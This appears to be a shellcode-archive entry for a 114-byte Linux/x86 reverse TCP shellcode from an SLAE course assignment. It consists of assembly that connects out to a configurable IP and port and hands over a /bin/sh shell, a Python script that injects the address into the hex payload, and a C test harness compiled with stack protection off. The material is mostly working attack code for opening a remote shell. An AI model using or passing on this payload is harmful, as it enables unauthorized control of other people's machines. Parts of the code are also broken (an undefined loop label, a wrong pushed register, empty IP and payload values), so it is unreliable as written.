Linux/x86 Reverse TCP Shellcode

114 bytes small Linux/x86 reverse TCP shellcode.

MD5 | 736ab2fee6b1fc77956e403631161630

; Title: Linux/x86 - Reverse TCP Shellcode ( 114 bytes )
; Author: Stylianos Voukatas
; Website:
; Date: 2020-12-30
; Tested on: Linux ubuntu 5.4.0-42-generic #46~18.04.1-Ubuntu x86_64
; Purpose: Assignment 2 for SLAE

; Student ID: PA-27669
; Shellcode-length: 114

;-------------------------------------- ASM --------------------------------------

global _start

section .text

; set registers to zero
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx

;socket section
mov ax, 0x167 ; set num for socket interrupt
mov bl, 0x02 ; set domain IPv4 Protocol, try also 0x00 for both v4 and v6, also one less instruction
mov cl, 0x01 ; set type
; edx is zero ; set protocol, leave it 0 so it will select on its own based on the type

int 0x80 ; interrupt for socket()

; eax will hold our file descriptor (fd)
mov esi, eax ; store fd

; connect section

; construct the struct sockaddr_in

; prepare eax for ip addr XOR, set a mask
mov eax, 0xffffffff
push edx ; padding 4 bytes
push edx ; padding 4 bytes

; address is in little endian 0xc01a8c0
; we XOR the address using a mask of 0xffffffff and we get 0xf3fe573f
; in order to restore the initial value we need to XOR again with the mask
; this is done to avoid null characters in case our ip addr contain 0
xor eax, 0xf3fe573f
push eax ; address field, set to, in little endian format

; same convertion for the port number

mov eax, 0xffffffff
xor ax, 0xc6fa ; port number 1337 after mask applied in little endian
push ax
push word 0x02 ; address family

mov ecx, esp ; save the struct address in stack

mov dl, 0x10 ; size of struct, 16 bytes (padding + address + port + family)

mov ebx, esi ; set fd

xor eax, eax
mov ax, 0x016a ; set num for bind interrupt

int 0x80

; check if connect succeed

test eax, eax ; if not zero then an error occured
jnz exit

; dup2 section
xor ecx, ecx
mov cl, 0x3 ; prepare for loop
xor eax, eax

; ebx has the fd from the previous call
; duplicate fd for stdin, stdout, stderr
mov al, 0x3f

dec cl
int 0x80

jnz dup_loop

; execve section

xor eax, eax

push eax ; push \0 in stack

; /bin//sh
push 0x68732f2f
push 0x6e69622f

mov ebx, esp

push eax ; push 0 in stack
mov edx, esp

push ebp ; push the address of /bin//sh in stack

mov ecx, esp ; put the address of args in ecx

mov al, 0xb
int 0x80


xor eax, eax
xor ebx, ebx
mov al, 0x01
mov bl, 0x07 ; just a random number as an exit code :)

int 0x80

;-------------------------------------- ASM --------------------------------------

Script to automaticaly produce the shellcode, set ip and port

;-------------------------------------- Python -----------------------------------

from operator import xor

# set ip and port
ip = ""
#port = "31337"
#ip = ''
port = '8888'

ip_in_xored_bytes = ''
port_in_xored_bytes = ''

shell_code_1 = "\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc6\\xb8\\xff\\xff\\xff\\xff\\x52\\x52\\x35"


shell_code_2 = "\\x50\\xb8\\xff\\xff\\xff\\xff\\x66\\x35"


shell_code_3 = "\\x66\\x50\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\x89\\xf3\\x31\\xc0\\x66\\xb8\\x6a\\x01\\xcd\\x80\\x85\\xc0\\x75\\x27\\x31\\xc9\\xb1\\x03\\x31\\xc0\\xb0\\x3f\\xfe\\xc9\\xcd\\x80\\x75\\xf8\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x55\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xb3\\x07\\xcd\\x80"

for byte in ip.split("."):
ip_in_xored_bytes += "\\x" + "{:x}".format(xor(int(byte),0xff))

port_in_xored_bytes += "{:04x}".format(xor(int(port),0xffff))
port_xored_formated = "\\x" + port_in_xored_bytes[:2] + "\\x" + port_in_xored_bytes[2:]

print "ip:", ip
print "xored ip: ", ip_in_xored_bytes
print "port:", port
print "xored port: ", port_xored_formated
print ""
shell_code = shell_code_1 + ip_in_xored_bytes + shell_code_2 + port_xored_formated + shell_code_3
print "ShellCode:"
print shell_code

;-------------------------------------- Python ------------------------------------

C program to test the payload
gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32

;-------------------------------------- Paylod test -------------------------------

unsigned char code[] = \

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;



Related Posts